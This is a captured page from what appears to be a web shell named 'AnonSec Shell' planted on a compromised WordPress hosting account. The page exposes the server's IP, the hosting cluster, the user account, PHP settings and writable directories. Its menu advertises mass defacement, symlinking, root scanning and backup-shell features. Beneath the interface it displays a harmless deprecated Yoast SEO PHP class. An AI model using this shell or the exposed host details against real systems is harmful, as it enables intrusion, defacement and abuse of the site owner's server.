. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 94.23.64.18  /  Your IP : 216.73.216.185   [ Reverse IP ]
Web Server : Apache
System : Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : villadal ( 6036)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/villadal/www/wp-content/plugins/wordpress-seo/src/deprecated/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/villadal/www/wp-content/plugins/wordpress-seo/src/deprecated/i18n/i18n-v3.php
<?php
/**
 * Yoast I18n module.
 *
 * @package Yoast\I18n-module
 */

/**
 * This class defines a promo box and checks your translation site's API for stats about it,
 * then shows them to the user.
 *
 * @deprecated 19.12
 * @codeCoverageIgnore
 * @phpcs:disable PEAR.NamingConventions.ValidClassName.Invalid
 */
class Yoast_I18n_v3 {

	/**
	 * Class constructor.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 *
	 * @param array $args                 Contains the settings for the class.
	 * @param bool  $show_translation_box Whether the translation box should be shown.
	 */
	public function __construct( $args, $show_translation_box = true ) {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
	}

	/**
	 * Returns whether the language is en_US.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 *
	 * @param string $language The language to check.
	 *
	 * @return bool Returns true if the language is en_US.
	 */
	protected function is_default_language( $language ) {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
		return true;
	}

	/**
	 * Returns the i18n_promo message from the i18n_module. Returns en empty string if the promo shouldn't be shown.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 *
	 * @return string The i18n promo message.
	 */
	public function get_promo_message() {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
		return '';
	}

	/**
	 * Returns a button that can be used to dismiss the i18n-message.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 *
	 * @return string
	 */
	public function get_dismiss_i18n_message_button() {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
		return '';
	}

	/**
	 * Outputs a promo box.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 */
	public function promo() {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
	}

	/**
	 * The API URL to use when requesting translation information.
	 *
	 * @deprecated 19.12
	 * @codeCoverageIgnore
	 *
	 * @param string $api_url The new API URL.
	 */
	public function set_api_url( $api_url ) {
		_deprecated_function( __METHOD__, 'Yoast SEO 19.12' );
	}
}

Anon7 - 2022
AnonSec Team